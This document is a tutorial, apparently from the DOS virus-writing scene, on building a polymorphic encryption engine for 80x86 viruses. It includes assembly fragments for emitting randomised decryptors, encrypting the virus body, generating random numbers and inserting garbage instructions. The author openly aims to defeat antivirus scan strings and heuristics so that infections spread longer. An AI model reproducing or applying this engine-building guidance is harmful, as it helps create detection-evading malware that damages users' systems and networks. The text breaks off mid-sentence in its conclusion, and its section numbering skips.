1. Introducing polymorphic code
NOTE: This article will mainly focus on the 80x86 architecture.
Note: Reading time: 30+ minutes; if you follow along, even more.
Polymorphism is, in my opinion, very hard to explain well in just one
little tutorial or in a single definition.
So, let me quote Wikipedia to describe the term more accurately:
In computing, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact - that is, the code changes itself every time it runs, but the function of the code (its semantics) will not change at all. For example, the simple math expressions 3+1 and 6-2 both achieve the same result, yet run with different machine code in a CPU. This technique is sometimes used by computer viruses, shellcodes and computer worms to hide their presence.
As I browsed the internet, I wondered where one could learn such an interesting method of encrypting code, especially in Assembly, so I just decided to write an article about it myself. The usual first step is to encrypt the virus body behind a decryption routine that doesn't look like one. This will fool most heuristic engines.
At this point the virus can't be spotted as an unknown virus (this type of virus scanning is called "generic" detection, of which heuristic detection is an example). But this still is not enough. Once the virus reaches an AV researcher, meaning a professional reverse-engineer who knows what he is doing, he can easily make a scan string from your l33t anti-heuristic decryption routine, and all your effort goes down the drain. Your virus / malware suddenly becomes detectable by every AV product known to mankind… (I know, it's a bit exaggerated, but it's a real nuisance if something gets detected and reverse-engineered…)
To prevent the AV community from using scan strings to detect your virus, you should avoid any constant values in the virus. We already encrypted the virus body, but the decryptor always remains constant, and can therefore be used for a scan string. Of course, we can't encrypt the decryption loop, but a possible solution is letting the virus produce a different decryption loop for each infection (or every few infections). This way, one copy of the virus will never look the same as another one. In other words: an AV product can't possibly detect the virus with a scan string.
Nice, but is this really worth all the hassle (considering that, most of the time, engines are larger than the virus itself)? Most of the time: YES. First of all, a polymorphic virus is very annoying for the AV people, or rather engineers, and assuming the engine is complex enough, they have to design a detection method dedicated to your particular engine. This will take some time, which gives your virus some more time to spread. Second of all, designing a detection method which catches 100% of all possible generations is very hard. The more complex your engine is, the harder it will be. If your polymorph is
not 100% detectable, it still stands a chance to survive, EVEN if AV say they can detect it. At this point I agree with Bontchev:
Any detection rate below 100% is practically useless, as one wrongly left infected file can re-infect the whole system/network. Concluding, it's fair to say that (well implemented) polymorphism is a very powerful tool as both a pre- and post-discovery strategy.
3. How do I call an engine?
The first thing that needs to be understood is how an engine is normally implemented in a virus, so I'll explain it with an example. (If you already understand this, you can skip this chapter, but keep these
parameters in mind, as I will be referring to them in the following example engine.)
Entry parameters:
DS:SI = code to be encrypted (virus body)
ES:DI = place to put decryptor and encrypted code
CX = code length
AX = offset in memory of virus entry
Returns:
CX = length of decryptor + encrypted code
DS:DX = offset of decryptor and encrypted code
What the engine will do, is encrypt a piece of code (the virus) with
some nice scheme, and place a matching decryptor in front of it. As you can
see, a user-friendly engine returns the parameters in i21/40 format: after
the engine is called, the virus needs only to set AH=40 and call Int21,
assuming the handle is in BX. Note that the input ES:DI and the output DS:DX
are the same.
So, what to do is the following:
(1) Set the correct parameter to point to the virus body, here DS:SI;
(2) Set the correct parameter to a free space in memory, big enough to
hold the decryptor and the encrypted virus body (Don’t forget to
include the engine in the size; it's a part of the virus.)
Here this parameter is ES:DI. Mostly the free space used is after
the virus.
(3) Set the correct parameter to the size of the virus (again include
the size of the engine, as it is a part of the virus).
(4) Set the memory offset parameter (here AX) to its correct value. This
is the offset (in memory, when the file is loaded) at which the
decryptor will start. This may require an example:
When infecting a 200 (decimal) bytes long COM, the offset at which the
decryptor (the beginning of the virus) will start would be 100h + 200d
= 1C8h. Note that the offset in the FILE would be 200d = C8h, but as
you know a COM file is loaded in memory after the PSP, i.e. starting from
offset 100h. With EXEs, this value would be the EXE’s new IP you’re
storing in the file header, as DOS doesn’t mess with this offset.
(5) We're almost ready to call the engine. The last thing to check is
whether the engine destroys any registers that aren't used as parameters;
knowing that will save you some debugging.
After that, call poly.
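To make this concrete, here is a minimal sketch of such a call. The labels virus_start, virus_end, workspace, mem_offset and poly are hypothetical names; I'm also assuming a COM infection, where CS=DS=ES, so the segment halves of the pointers are already correct:

    mov     si, offset virus_start          ; DS:SI -> code to be encrypted
    mov     di, offset workspace            ; ES:DI -> free space for decryptor + encrypted body
    mov     cx, virus_end - virus_start     ; CX = virus length (engine included)
    mov     ax, mem_offset                  ; AX = memory offset the decryptor will run at
    call    poly                            ; returns CX = total length, DS:DX -> output
    mov     ah, 40h                         ; i21/40: write CX bytes from DS:DX
    int     21h                             ; (file handle assumed to be in BX already)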
4. An example
A polymorphic engine produces (from a given set of variations) a random decryptor which matches the (also random) encryption method on each infection. How does it know how to do that? The programmer of the engine thought of a couple of decryptor layouts, from which the engine chooses one,
and then it randomizes any variable bytes in it. This requires explanation: Let’s just assume that a (primitive) engine has only one decryptor layout.
Let’s say it looks like this:
MOV <reg16> , offset_of_first_encrypted_word        ;[1]
:decrypt_next_byte:
<crypt> [<reg16>] , random_immediate                ;[2]
<increase> <reg16>                                  ;[3]
CMP <reg16> , offset_of_last_encrypted_word         ;[4]
JB decrypt_next_byte                                ;[5]
Legend: <reg16>    = a random 16 bit register (AX, BX, SI, BP, etc.)
        [<reg16>]  = pointer to contents of offset stored in <reg16>
                     eg: BX=1234, [BX]=what's at offset 1234
        <crypt>    = a crypt instruction, eg: XOR, ADD, SUB
        <increase> = add 2 to the <reg16> (add 1 for byte encryption)
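To give you an idea of what the engine should spit out, here is one possible generation of this layout; the register, the offsets and the immediate are of course made up:

    mov     si, 0135h                   ;[1] offset of first encrypted word
decrypt_next_byte:
    xor     word ptr [si], 4F2Ah        ;[2] crypt operation with a random immediate
    inc     si                          ;[3] add 2 to SI (word encryption)
    inc     si
    cmp     si, 02F7h                   ;[4] offset of last encrypted word
    jb      decrypt_next_byte           ;[5] not done yet, decrypt the next word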
The engine will fill in all variable values:
[1] It selects (from a table given by the programmer) a random register to
work with. In this example the engine will store the MOV instruction
encoded with the correct register (more on this later), after which it
will store the offset of the first encrypted byte (or word) of the virus.
[2] After that, it selects (again from a table given by the programmer) a
decrypt operation. Note that the engine has to remember which decrypt
operation it chose, because later on, the virus has to be encrypted in such
a way that the previously generated decryptor will correctly decrypt the
virus. That’s right, the encryption method is derived from the generated
decryptor. The engine stores the crypt-instruction, and then it will
generate a random value (the immediate) which will accompany the crypt
operation. Again this value needs to be remembered, otherwise later on, the
virus can’t be encrypted so that the decryptor works. For example, if the
random value is 1234 and the crypt-operation is XOR and the register is BX,
the crypt-instruction is XOR [BX],1234 (duh). The engine stores the value,
and repeats this step a (random) number of times, as a single encryption
operation yields a weak encryption.
[3] Add 2 to <reg16>. Advanced engines choose whether to use byte or
word encryption; this example engine uses word encryption. The
register needs to be increased by two, so that in the next decryption loop
the decryptor will decrypt the next word.
[4] Compare the register to EOV (end of virus). Speaks for itself.
[5] If we haven’t reached EOV yet, jump and decrypt the next byte/word.
4.1 Register Encoding
In this example the engine wants to pick a register. To understand how this works, we need to take a look at the instruction encoding of the 80x86. If you don't have technical documents at hand, you can easily grab SoftIce and a hex-bin calculator and start investigating. Here's what MOV reg16,reg16 looked like when I investigated it:
INSTRUCTION HEX BINARY
MOV AX,AX 8BC0 10001011 11000000
MOV AX,BX 8BC3 10001011 11000011
MOV AX,CX 8BC1 10001011 11000001
MOV AX,DX 8BC2 10001011 11000010
MOV BX,AX 8BD8 10001011 11011000
MOV BX,BX 8BDB 10001011 11011011
MOV BX,CX 8BD9 10001011 11011001
MOV BX,DX 8BDA 10001011 11011010
MOV CX,AX 8BC8 10001011 11001000
MOV CX,BX 8BCB 10001011 11001011
MOV CX,CX 8BC9 10001011 11001001
MOV CX,DX 8BCA 10001011 11001010
(…)
Obviously, the first byte in a MOV reg16,reg16 instruction is always 10001011b or 8Bh. The second byte only changes a little if we alter the registers. A closer look reveals that bits 7 and 6 always remain 11, and in these samples bit 5 and bit 2 stay 0 as well.
NOTE: The bit most to the right is called bit 0, so the bit most to the left is the last bit: bit 7. A byte consisting of 7 bits instead of 8? No, bit 0 is the 1st bit, so bit 7 is the 8th bit.
Now it looks like the rest of the byte changes all the time, which is indeed the case. I hear the attentive reader shouting: but what about bit 5 and bit 2?! Well, in this example I didn't use the 16 bit registers SI, DI, SP and BP. Those can also be encoded, and they need that third bit of their field.
Conclusion: 10001011 11... ... = MOV reg16,reg16
Note that the first three dots are filled by bits representing the TARGET register, i.e. the one to the left, and the second three dots represent the SOURCE register, the one to the right.
The attentive reader probably noticed that I just explained the MOV reg16,reg16 instruction, while the MOV in the example engine doesn’t need the two registers after the MOV, but only one register and an immediate (the starting offset). Let’s take a look at that:
INSTRUCTION HEX BINARY
MOV AX,1234 B83412 10111000 00110100 00010010
MOV CX,1234 B93412 10111001 00110100 00010010
MOV DX,1234 BA3412 10111010 00110100 00010010
MOV BX,1234 BB3412 10111011 00110100 00010010
MOV SP,1234 BC3412 10111100 00110100 00010010
MOV BP,1234 BD3412 10111101 00110100 00010010
MOV SI,1234 BE3412 10111110 00110100 00010010
MOV DI,1234 BF3412 10111111 00110100 00010010
This time it may be more interesting to look at the hex values than at the binary values. I have sorted the instructions a bit, so it shouldn't be hard to see a pattern. The difference with the previous example is that the 'register encoding' is now done in the first (and only) opcode byte of the instruction. The whole instruction takes three bytes: one for the opcode with a register encoded in it, and the other two hold the immediate, stored in Intel little-endian format.
When we further analyze this example, we see that (in the first byte) only the last three bits change every time. Considering the fact that 3 bits are necessary to encode 16 bit registers in instructions, that should be fine.
Conclusion: 10111... 00110100 00010010 = MOV <reg16>, 1234
Now it's time to list the registers and how they're encoded in instructions. Looking at both examples we can easily spot the following:
AX = 000b = 0h
CX = 001b = 1h
DX = 010b = 2h
BX = 011b = 3h
SP = 100b = 4h
BP = 101b = 5h
SI = 110b = 6h
DI = 111b = 7h
All usable 16-bit registers are listed here (IP doesn't count), and we can see that they all just fit in the available 3 bits. What a coincidence… Write this list down, you'll be needing it.
The question now is: how do we tell the engine to do this? Very simple: the boys at Intel invented the OR instruction. I think many beginner virus writers do not know the exact purpose of this instruction, since for simple COM/EXE techniques it is seldom used. I think you should keep its truth table in mind… :
0 OR 0 = 0
0 OR 1 = 1
1 OR 0 = 1
1 OR 1 = 1
But you're probably wondering: for what purpose would I ever want to use this instruction? Well, what it actually does is make sure that in the target byte all bits are SET (=1) which are set either in value 1 OR in value 2. And this is very useful for register encoding. Remember our "wildcard" for MOV reg16,reg16? It was: 10001011 11... ... with the first three dots for the target reg16, and the second three for the source reg16. Say we fill the dots with zeros, and then OR them with the encoding values for the registers. Say we wanted MOV BX,CX. First we'd want to move the value 10001011 11000000 (the basic value for MOV reg16,reg16) into a register, otherwise the CPU can't work with it. We'll put it in AX:
MOV AX, 8BC0h (use your bin2hex calculator)
Then we want to have the encoding value for the target register in bits 3-5, and the source register in bits 0-2, because the MOV instruction requires us to do so. BX=011b and CX=001b, so when we put this together we get 011001b, which is 19h. What happens when we OR this value with AX (which contains the value for a
MOV instruction): OR AX, 19h (again, use the bin2hex calculator).
AX  = 8BC0 = 10001011 11000000
19h =        00000000 00011001  OR
---------------------
10001011 11011001 ;which is 8BD9, which is MOV BX,CX
Mission accomplished, you now know how to encode registers in instructions.
4.2 Picking a register
One of the first things an engine needs to do is pick a register to work with. Here we will see a big drawback of this particular decryptor layout example. In this example we are using registers to point to memory locations, e.g. XOR [BX],1234. Due to the 80x86 architecture, we are limited to just four registers that can do that, namely BX, SI, DI and BP. So XOR [AX],1234, for example, is an illegal instruction. Only those four registers are capable of this addressing mode.
There's one problem with BP though. Let me show you something:
81 37 34 12 XOR WORD PTR [BX],1234
81 77 01 34 12 XOR WORD PTR [BX+1],1234
In the first instruction, we're addressing with just the register, without a relative offset. In the second instruction, we DO have a relative offset, and it is encoded in an extra byte. Note that the second byte changes from 37 to 77 when we introduce the relative offset. On bit level, 37 and 77 differ in only one bit, namely bit 6. This is of course to let the CPU know whether there will be a relative offset or not.
81 34 34 12 XOR WORD PTR [SI],1234
81 74 01 34 12 XOR WORD PTR [SI+1],1234
The same story goes for SI. When there is no relative offset accompanying the register (in other words: relative offset = 0), the instruction looks different. And the same applies to DI, but not to BP:
81 76 00 34 12 XOR WORD PTR [BP+00],1234
81 76 01 34 12 XOR WORD PTR [BP+1],1234
As you can see, when there is no relative offset accompanying the register, it’s still encoded, simply as a zero byte.
What does this have to do with the engine? Well, in the decryptor in the example, we're addressing without a relative offset. For SI, DI and BX this means there will not be a zero byte to tell the CPU so, just a bit set or cleared in the instruction byte. This is a good thing, because otherwise we would have a stable byte (i.e. a byte that's the same in each decryptor generated), namely that zero. So if we wanted the engine to be able to pick registers from a list which included BP, we would have to write a routine
that checks whether it picked BP, and if so, adjusts the instruction byte and writes the extra zero. Of course, for the purpose of creating decryptors as random as possible, this is a good idea. This, however, is an improvement to work on once you have finished a working engine. I'm giving you good advice here: don't try to create a complex engine right away; first start with a simple but working 'framework', which you can expand later on. If you start including all kinds of nice features right away, you'll probably just end up debugging for a very long time.
Back to the example. I'm assuming we'll just use BX, SI and DI, so we don't have to deal with that relative offset. Just put the register encoding values for BX, SI and DI in a table, and let the engine choose from them.
Maybe you're wondering why I told you this whole story about BP and its relative offset. It's not really that important, and it's specifically a problem for this type of decryptor layout; I also could've just told you:
don't use BP in this example. I didn't, because I wanted to show you that you can't just "assume" stuff; you should check everything.
4.3 Moving
In the example engine, we want to have MOV <reg16>, imm16, which looked like:
10111... 00110100 00010010 = MOV <reg16>, 1234
We don't want the 1234, so forget the last two bytes. What matters is that the instruction byte (the first byte) is 10111..., with a register encoding value filling the last three dots.
Example: how would we make the engine generate a MOV SI,0120 in the decryptor? We'd first have to fill the dots in the unencoded value for MOV <reg16>, imm16 with zeros, so we can OR the correct register code into it. From now on, when I'm talking about an unencoded value for an instruction, I'm assuming the dots are filled with zeros. Okay, so the unencoded value for MOV <reg16>, imm16 is B8h (converted to hex); let's put that value in AX. Then, we'd have to OR AX with the correct register encoding value. We wanted SI, whose value is 6h (110b), so we perform: OR AX,6h.
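A minimal sketch of how the engine could emit this instruction, assuming ES:DI points into the decryptor buffer and BL holds the chosen register code (I use AL here, since one byte is all we need for the opcode):

    mov     al, 0B8h                ; unencoded opcode for MOV reg16,imm16
    or      al, bl                  ; encode the chosen register (6 = SI gives 0BEh)
    stosb                           ; store the opcode byte at ES:DI
    mov     ax, 0120h               ; offset of the first encrypted word (example value)
    stosw                           ; store the imm16, little-endian (20 01)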
4.4 Decrypting
Let me first of all mention once again the fact that the strategy behind most engines is that first the decryptor is generated, and after that the correct (matching) encryption is applied to the virus. Just to prevent some confusion.
Now, we want to make a decryptor, and we want each decryptor to be as random as possible. So we have to give the engine as many crypt operations as possible. XOR, ADD and SUB are good examples, because they have the same instruction layout. They work with 2 operands; for our purpose these will be
the pointing register and a random 16 bit immediate, so e.g. SUB [BX],1234. It's a good idea to include more crypt operations like NEG, NOT, INC, DEC, but the disadvantage of these other types is that they have different instruction layouts, and therefore require separate routines for including them in the decryptor. If you do decide to include more crypt operations in your engine, these four are a good choice, because they all take one operand, and for our example engine that would be a pointing register, e.g. NOT WORD PTR [SI]. Let's just say our example engine uses only XOR, ADD and SUB.
Again, to build an instruction, we need to know the unencoded value for the instruction. Assuming the dots (where the register encoding should take place) are filled with zero-bits, here are the values:
XOR: 81 30 xx xx
ADD: 81 00 xx xx
SUB: 81 28 xx xx
Please note that these are the values for use with pointing registers. So with these values, you would be able to produce an instruction like XOR [SI],1234 but not XOR SI,1234 ! We need pointing registers for our example engine, so the above values will do.
Another important note: the first byte is 81, no matter which crypt instruction the engine picks… That's not ideal, because the whole idea of the engine is that we don't want any "stable bytes" in the decryptor. So you can see you can't make do with only these three crypt operations, simply
because they create a stable byte. As said, it is wise to ignore this for the time being and first try to create a working engine. Then you can start working on problems like these. Well, you actually need to work on them, because if you leave stable bytes in your decryptor, you still haven't eliminated the possibility of scan strings.
Okay, back to the program. Say the engine picked ADD as the crypt operation. We can simply store the 81, since it doesn't need any register encoding. Then we have to encode the correct register in the second instruction byte. Earlier, we encoded plain registers in the instruction; now we need to encode pointing registers. I haven't given you the encoding values for the pointing registers yet, so here they are:
000b = 0h = [BX+SI]
001b = 1h = [BX+DI]
010b = 2h = [BP+SI]
011b = 3h = [BP+DI]
100b = 4h = [SI]
101b = 5h = [DI]
110b = 6h = [immediate]
111b = 7h = [BX]
You should see a possible advancement: addressing using two registers. For example, set BX to zero, and let SI be the pointing register, but now use [BX+SI] instead of just [SI] to address the correct byte/word. That results in more randomness.
OR the second byte of the chosen crypt operation (00h for our ADD, 30h for XOR, 28h for SUB) with the correct register encoding value, store the byte, and then store a random 16 bit immediate. Don't forget to "remember" which crypt op the engine stored, and which immediate it used. Most engines build an encryptor along the way, which can be executed once the decryptor is generated.
This is only one crypt operation. Just repeat this step a couple of times, depending on how much crypt operations you want in your decryptor.
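Putting it together, a sketch of emitting one crypt operation could look like this. ES:DI again points into the decryptor buffer, BL this time holds the pointing-register code from the table above (4=[SI], 5=[DI], 7=[BX]), and get_random_word is a hypothetical routine (see section 6):

    mov     al, 81h                 ; first byte, the same for ADD/SUB/XOR with imm16
    stosb
    mov     al, 00h                 ; unencoded second byte: 00h = ADD (30h = XOR, 28h = SUB)
    or      al, bl                  ; encode the pointing register in the lower 3 bits
    stosb
    call    get_random_word         ; hypothetical randomizer, returns a word in AX
    stosw                           ; store the random imm16 (and remember it for the encryptor!)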
4.6 Increasing
Now it's time for the decryptor to increase the register. Since we're using word encryption, the register needs to be increased by two. Obvious instructions are two INCs, ADD reg,2, or maybe even SUB reg,-2. But also consider string instructions like SCAS, CMPS, STOS, LODS and MOVS. They perform an action, and then increase SI, DI or both. That could suit our purposes quite well. However, be careful with these, as for instance MOVS may have some unwanted results. You should be able to find the correct values for these instructions yourself. To keep this tutorial from getting too long-winded, I will only briefly explain the use of the two INCs; you should be able to figure out the rest yourself.
The unencoded hex value for INC reg16 is 40h (hi P/S), and you should encode it with the normal register encoding values (not the pointing-register values, because that would turn it into a memory operation; compare INC BX and INC [BX]) to get the necessary result. E.g. INC SI would be OR 40h,6, with 6 being the register encoding value for SI. This should be clear by now. Store the result twice, since we need to add 2.
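As a sketch, with BL holding the normal register encoding value of the chosen pointer register:

    mov     al, 40h                 ; unencoded opcode for INC reg16
    or      al, bl                  ; e.g. 40h OR 6 = 46h = INC SI
    stosb                           ; store it...
    stosb                           ; ...twice, because word encryption means +2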
The compare comes next: store 81h again, followed by a ModRM byte which is F8h ORed with the normal register encoding value (compare the 81 FB = CMP BX,imm16 in the example below). After that, we'll have to store the imm16. This value is the last byte/word that needs decrypting. How do we calculate this value? Rather simple: starting offset + code length. The code length is passed to the engine in CX, and the starting offset can be calculated as memory offset + decryptor length. The memory offset was again a parameter of the engine, namely AX, and the decryptor length shouldn't be hard to calculate. If your decryptors are always the same length it's easy, but when you have variable length decryptors, you should keep track of how many bytes you're storing. So:
               AX                  decryptor length           CX
/--------------------------------\ /-----------\ /-----------------------\
.---------------------------------.-------------.-------------------------.
|            Host file            |  Decryptor  |       Virus body        |
'---------------------------------'-------------'-------------------------'
                     last byte/word to be encrypted ----------------------/
AX + decryptor length + CX = CMP operand
Add the values, and store it as operand.
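A sketch of emitting the CMP, assuming the engine kept that sum (entry AX + decryptor length + CX) in DX, which is a register choice I'm making up for the example:

    mov     al, 81h                 ; CMP reg16,imm16 also starts with 81h
    stosb
    mov     al, 0F8h                ; ModRM: mod=11, /7 = CMP, register in the lower 3 bits
    or      al, bl                  ; BL = normal register code of the pointer register
    stosb
    mov     ax, dx                  ; DX = AX + decryptor length + CX (kept by the engine)
    stosw                           ; store the CMP operand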
4.7 Jumping
After the CMP comes a conditional jump. The obvious instruction would be JB, but that again introduces a stable byte, because we don't have a substitute for it. Of course, JNAE (or JC) would be nice, but the problem is that they have the same hex value as JB, which is not so weird considering that they do exactly the same thing. What about JNZ? This could be interesting, but only if we'd add one/two to the CMP operand… otherwise the last byte/word wouldn't get decrypted… Again, I'm assuming we're only using JB. (Note that IF you choose to use the JNZ option, the following explanation also more or less applies to it.)
If the condition is met (condition = we're below the last byte/word), the jump should go back to the first decryption operation. How do we "encode" this? First of all, JB has 72h as its hex value, so we can store that. As you should all know from COM infections, such a jump has a displacement byte right behind it. This displacement byte is the number of bytes the CPU should move IP, counted from the offset of the next instruction (so 2 bytes behind the 72 of the JB). Here's an
example:
0BF9:03B6 81 37 64 23 XOR [BX],2364
0BF9:03BA (...) (...)
0BF9:03C6 81 FB A4 06 CMP BX,06A4
0BF9:03CA 72 EA JB 03B6
0BF9:03CC (...) (...)
In this example the first decrypt operation starts at offset 3B6. The "next instruction" I was talking about would start at 3CC in this example. So the correct calculation for the JB displacement would be:
New offset - Offset of next instruction = Displacement
3B6 - 3CC = FFEA
As you can see, we get FFEA as the displacement. We can only use one byte, so that would be EAh. Now most of the time you would say that EAh = 234d, but there's also something to say for EAh = -22d (-16h), and that's exactly the number of bytes the CPU should move back. Note that you don't have to worry about things like the memory offset, because it doesn't matter where in memory this code is located: the displacement will be the same every time, as the number of bytes to move doesn't change.
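A sketch of emitting the jump, assuming the engine saved the buffer offset of the first crypt operation in BP (again a register choice I'm just making up):

    mov     al, 72h                 ; opcode for JB rel8
    stosb                           ; DI now points at the displacement byte
    mov     ax, bp                  ; buffer offset of the first crypt operation
    sub     ax, di                  ; displacement is counted from the NEXT instruction,
    dec     ax                      ; which starts one byte further (after the displacement)
    stosb                           ; store AL, the signed 8-bit displacement (e.g. EAh)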
5. Encrypting
At this point we're done with the decryption loop. Along the way I kept telling you your engine should "remember" what it did. Sounds okay, but you're probably wondering how that works. First of all, when making a table with crypt operations, it is wise to include the inverse crypt operations as well: store SUB along with ADD, ADD along with SUB, and XOR along with XOR. That way, you can store the decrypt operation in the decryptor, and the inverse operation (for encrypting) in the encryptor. Note that the
first instruction in the decryptor should have its inverse operation as the last operation in the encryptor.
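One simple way to implement this "remembering" is a table that pairs every decrypt operation with its inverse; the values below are the unencoded second bytes from section 4.4:

crypt_pairs:
    db      30h, 30h                ; decryptor uses XOR -> encryptor uses XOR
    db      00h, 28h                ; decryptor uses ADD -> encryptor uses SUB
    db      28h, 00h                ; decryptor uses SUB -> encryptor uses ADD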
6. Randomize
Throughout this tutorial I told you to let your engine pick something at random. Most high level languages have functions which return a “random” value, but, as usual in assembly language, we get to do it ourselves.
As there is no way you can actually make a computer return a totally random value, we have to build a routine that gives us a value as random as possible. The most common way to get a random value is reading from port 40h (the system timer). Because that value isn't really random, it's wise to perform some extra calculations on it to randomize the number some more. Another possibility is to let the decision depend on a value like the system time or date.
BTW: when you manage to do this correctly, you’ll get a form of slow
polymorphism.
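A minimal sketch of such a randomizer, reading the timer at port 40h and stirring the result with a stored seed (rnd_seed is a hypothetical variable of the engine; the cs: override is there so it also works when DS points elsewhere):

get_random_word:
    in      al, 40h                     ; low byte of timer channel 0
    mov     ah, al
    in      al, 40h                     ; read again for a second byte
    add     ax, word ptr cs:[rnd_seed]  ; mix in the previous result
    rol     ax, 1                       ; stir the bits a little
    mov     word ptr cs:[rnd_seed], ax  ; keep it as the next seed
    ret
rnd_seed    dw      1234h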
Experiment with calculations and write a program which outputs the random values to screen on bitlevel. Investigate the values to check if they really are quite random. Note that this is quite important, and if you rely on a bad randomizer, you’ll end up with some options of your engine getting disabled, as they’re never reached.
Once you have a random value, and you want to use it to decide e.g. which crypt operation to use, you have to AND it down to (at most) the offset of the last entry of the table. (If you don't understand what AND is: AND makes sure that in the result byte only those bits will be set which are set both in the first operand AND in the second operand. If necessary, re-read the part about OR, and investigate AND in the same way, i.e. try to get to know what it really does.) So, if you have 5 options, AND the random value with 4, so you can add the result to the starting offset of the table. Don't AND it with 5, because starting offset + 5 is just behind the table; remember that there's a value at offset 0 too. So, if you have x values, AND the random value with x-1.
There is one problem though, which is overlooked by some writers. Get your hex2bin calculator, and start ANDing random values with 4h. Say you do it 100 times, you’ll only get either 4 or 0 as a result. You’ll NEVER get 1, 2 or 3. Hmm… weird… Let’s try it with 5h. Perform AND xx,5 with 100 values, and you’ll get 0, 1, 4 and 5. But NEVER 2 or 3. To understand this problem, we have to look at the values we’re ANDing with at bitlevel:
0h = 00000000b
1h = 00000001b
2h = 00000010b
3h = 00000011b
4h = 00000100b
5h = 00000101b
6h = 00000110b
7h = 00000111b.
When ANDing with a value, bits in the result byte will only be set if they're also set in the value you're ANDing with. Say you're ANDing with 5h, and you'd want to get 3h as a result. 3h equals 11b, so that means that in the value we're ANDing with, bit 1 (and bit 0) would have to be set. Because the value we're ANDing with is 5h, and that equals 101b, bit 1 can NEVER be set in the result. So you'll never get 3h (or 2h) as a result. Again, this is quite important, because if you choose to neglect this problem, you'll end up with some features of your engine simply being disabled…
I hope you already have a feeling that values with all (necessary) bits set are suitable for ANDing with, as the result of the operation varies from 0 to the value you’re ANDing with, which is what we want. So 1b (mostly unnecessary), 11b, 111b, 1111b and so on, are values suitable for ANDing with. If you have too few options in your table and can’t think of another option to fill the table with (so you can AND with one of the mentioned values), you could simply put duplicate options in your table. This isn’t as unsophisticated as it may seem at first glance, as some options are more flexible than others: e.g. when deciding whether the engine should use normal INC or a string operation (LODS, STOS, etc.) for increasing, the option for “use a string operation” is attractive for duplicating in your table, as it has more sub-options (later on, the engine has to decide which string operation it should use) than the “use an INC” option.
Please note that this is just one way of working around this problem. At this point you can make use of your creativity to come up with another solution if you want to. But somehow I can't imagine that it's really efficient memory-wise.
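As a sketch, here is how the engine could pick one of the three crypt operations, with the table padded to a power of two by duplicating an entry:

crypt_ops   db      30h, 00h, 28h, 30h  ; XOR, ADD, SUB, and XOR again as filler

    call    get_random_word             ; hypothetical randomizer from above
    and     ax, 3                       ; 4 entries -> mask with 11b (x-1)
    mov     bx, ax
    mov     al, crypt_ops[bx]           ; AL = unencoded second byte of the chosen operation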
7. Sidenote
One more important note. When working on your own engine, you're probably planning to add some nice features. And when you're including new instructions, you need to know their unencoded values. If you don't happen to have SoftIce running in the background, it's probably very tempting to use DOS DEBUG to check out the values. Never do that… There is something very strange about the 80x86 architecture:
Some instructions can take two different identities. E.g. the instruction “OR AX,AX” can take “09C0” as “identity”, but “0BC0” gives us the exact same instruction.
All so-called "official" assemblers, like Borland's TASM, Microsoft's MASM and all others, pick the same one of the two choices they can make, namely the "highest" (so "0BC0" for "OR AX,AX"). In other words, if a certain instruction takes an identity which normally wouldn't be produced by regular assemblers, it
is very likely this is the work of some polymorphic engine. Some (or most?) antivirus programs know this and raise an alarm if they find such an instruction. I recommend using SoftIce anyway (although its assembler also has some bugs), but if you for some strange reason don't or can't, use Borland's Turbo Debugger
to check the values; I guess that should do the trick too.
A sidenote to this sidenote: the still ever popular A86 shareware assembler has a nasty side effect.
At times, it seems to pick the “wrong” one of the two possible instruction codes, resulting in the same alarms being produced. This can easily be avoided by using the TASM Assembler. There’s no reason for not using TASM anyway.
8. “Garbage”
Garbage instructions are instructions included in the decryptor which serve no real purpose for the execution of the decryptor; they are only included to hide its otherwise obvious real purpose. Without any garbage, the decryptor actually looks like a decryptor, which makes it very easy to spot heuristically. Furthermore, garbage instructions put the "real" instructions at random places (in a constant order, of course). In one generation the increase and compare operations are right next to each other, while in another generation some other (do-nothing) instruction sits between them.
The classical concept of garbage instructions consists of including one-byte do-nothing instructions like NOP, CLC, STC, INT 3 (the only one-byte interrupt, CCh) between the actual decryptor instructions. Nowadays, the use of these one-byte instructions has become rather pointless, as almost all AV programs simply ignore them when they encounter a decryption loop.
These one-byte do-nothing instructions have also led to something AV calls variable scan strings. In these scan strings, it doesn't matter whether you have zero or thousands of garbage instructions between two constant values; the AV program just ignores those, and just checks if the two constant values occur in the right order (so, first the increase, then the compare instruction, assuming these are stable bytes in the decryptor). In other words, these one-byte garbage instructions really serve no purpose anymore.
Furthermore, AV has noticed that huge amounts of these kinds of garbage instructions in a relatively small area are very likely to be the results of a polymorphic engine. In other words, using these one-byte do-nothing instructions can result in heuristic flags being triggered.
Luckily, there are other ways of producing "garbage code". The basic idea behind all of them is producing code which could pass for code required for the program to run correctly. A nice example is including some pointless Int21 call, like GetVersion or something. There are a lot of possibilities here. Each time, take two things into account:
(*) Whatever garbage you use, make sure it doesn't influence the
execution of the decryptor, but also make sure it LOOKS like useful
code
(*) When using large garbage constructions (like the setting up of an
Int21 call), make sure you have enough variations, otherwise AV could
make a scan string (or a few more, if that would be enough to cover your
your garbage code!
Also consider the possibility of including some nice armor tricks in the garbage construction (I'm calling it a construction because sometimes the "garbage" doesn't consist of just one instruction anymore), but again, make sure to have enough variations, because armor code is of course
uncommon code, which AV loves, because they can make scan strings out of it…
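As an illustration, here is one possible garbage construction built around a harmless Int21 call (AH=19h, get current default drive, which clobbers only AX). Note that the CMP changes the flags, so garbage like this must never be emitted between the CMP and the JB of the decryptor:

    mov     ah, 19h                 ; DOS: get current default drive
    int     21h
    cmp     al, 2                   ; "check" whether we run from C:, then ignore the answer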
For those wondering how to include garbage instructions/constructions at random: just place a call to your insert_garbage_at_current_offset routine before each major decryptor operation. An extremely simplified example:
start:
call maybe_insert_garbage
call set_up_registers
call maybe_insert_garbage
call perform_move_instruction
call maybe_insert_garbage
call do_first_crypt_operation
call maybe_insert_garbage
(...)
9. Multiple Decryptors
A virus writer who for some reason doesn't want to include a complete engine, but still wants some variation in his decryptors, may consider using a couple of constant decryptors. They all do the same thing, but they look different. Here, the variation isn't on the instruction level, but on the routine level, which is far simpler to implement. This technique could be called polymorphic in its literal meaning (poly=many, morph=shape), but as just a few different routines are generated, it's usually called oligomorphic (oligo=few). On its own this method isn't considered very strong, as a small set of scan strings can be used to identify every possible generation.
Combining these two methods, however, gives a very large variety of both decryptor layouts and decryptor instructions, which can be considered strong polymorphism (don't confuse it with polymorphism in the object-oriented programming world). Most of the more powerful engines combine the two methods, and are therefore very hard to detect reliably.
10. Conclusion - The very end of this article
Throughout this tutorial I have tried to explain how to avoid constant
values using variation on instruction level. If you want to extend your engine
with variation on routine level you’ll have to use well-considered code. The engine
should decide which decryptor layout (routine) it will generate, and then it
